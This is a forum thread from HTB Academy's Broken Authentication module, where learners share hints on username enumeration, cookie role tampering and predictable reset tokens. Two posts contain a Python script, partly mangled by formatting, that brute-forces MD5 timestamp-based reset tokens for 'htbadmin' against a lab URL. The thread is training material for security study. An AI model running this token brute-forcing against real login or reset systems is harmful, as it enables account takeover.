BROKEN AUTHENTICATION module | HTB Academy

Hi All - Looking for help in pointing me in the right direction for the skills assessment at the end of this course.

I have worked out the cookie encoding and fuzzing the m****** page I can only find accounts for guest and support.

I can alter the cookie so that I can be “support” but this always directs me to the error page indicating that “support” cannot log on with that role.

Are there other users that I’m missing? I cannot find any old accounts that are mentioned on the support page and stuck at where to try next.

Any pointers?

first, we have to understand the service on this page, try to enumerate manually, read all content, and understand what it said.
next, we have to try the functions on it, the important point is to understand this service!

2 Likes

cracked it…thanks Satellite!

Could someone hint me with the “Broken Authentication” , “Bruteforcing Usernames” section ./question2/ Broken Authentication Login - User inference!?
I can find yet neither pre-filled input nor the ‘failed_login’ cookie, just the “Invalid credentials” in responds.
I have fuzzed the “Username”, “wronguser”, both of them with Burp intruder and manually using top-usernames-shortlist.txt - nothing interesting. Perhaps I have overlooked smth? Response source is not seems to be unusual.

I still can’t get this, I’ve found 4 accounts and cannot cookie them (cannot have requested role). I’ve tried all combinations of ffuf against r*.php and m*.php but no working hit. Any other hint? thanks

use the dictionary that is mentioned in this section (bruteforcing username)

I have got it in the a expected way and it implies with belief in the given hint review the code carefully.

hi all, I can’t find the way to make htbadmin token work. banging my head on wall

I will happy to help you without spoilering if you still needed.

1 Like

hi can you help pls i am converting the time printed on the page to epoch then adding +1000 -1000 this is my script
from hashlib import md5
import requests
from sys import exit
from time import time
import datetime

url = “http://138.68.149.48:32593/question1/

header= {“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8” , “Content-Type”: “application/x-www-form-urlencoded”}
now = int(1640972294000)
start_time = now
fail_text = “Wrong token”
user=“htbadmin”
endtime=now+1000

for x in range(start_time-1000, endtime):
raw_data = user+str(x)
md5_token = md5(str(raw_data).encode()).hexdigest()
data =“token={md5_token}&submit=check”

print("checking {} {}".format(str(x), md5_token))

res = requests.post(url, data=data,headers=header)

if not fail_text in res.text:
    print(res.text)
    print("[*] Congratulations! raw reply printed before")
    exit()


    exit()

try it

1 Like

it workedd thanks mate ,dunno what was wrong with my epoch

Can you give any more hints?

hi im stuck in Predictable Reset Token i rewrite the script but i cant get the token can someone help

Did you keep in mind the different time zones? The displayed time zone is your local time zone in UTC, the server might have a different one. Thus, ±1 s is probably not enough

i take the time given in server responce i pass it as milliseconds but nothing, i also tried with my time

Ok, but the given server time zone might not be the real one. Try to use greater offset instead of ±1 s. For speeding things up, try to generate the given token (which can be conducted offline).

Text me If you want!
I will support you!
my discord satellite#1213

i find it tnx for the help! i get it with wfuzz, i will try it with my script again to find why it dosent work

Can anyone give me a hand with the Predictable Reset Token questions? I am stuck on question 1 right now. I think I should be using something like the python script that is referenced in the module and above. Not sure what I am missing on it.

from hashlib import md5
import requests
from sys import exit
from time import time
import datetime

url = "http://46.101.81.30:32186/question1/"

header= {“User-Agent”: “Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0”, “Accept”: “text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8” , “Content-Type”: “application/x-www-form-urlencoded”}
now = int(1650581532000)
start_time = now
fail_text = "Wrong token"
user= "htbadmin"
endtime=now+1000

for x in range(start_time-1000, endtime):
** raw_data = user+str(x)**
** md5_token = md5(str(raw_data).encode()).hexdigest()**
** data =“token={md5_token}&submit=check”**

print(“checking {} {}”.format(str(x), md5_token))

res = requests.post(url, data=data,headers=header)

if not fail_text in res.text:
** print(res.text)**
** print("[*] Congratulations! raw reply printed before")**
** exit()**

** exit()**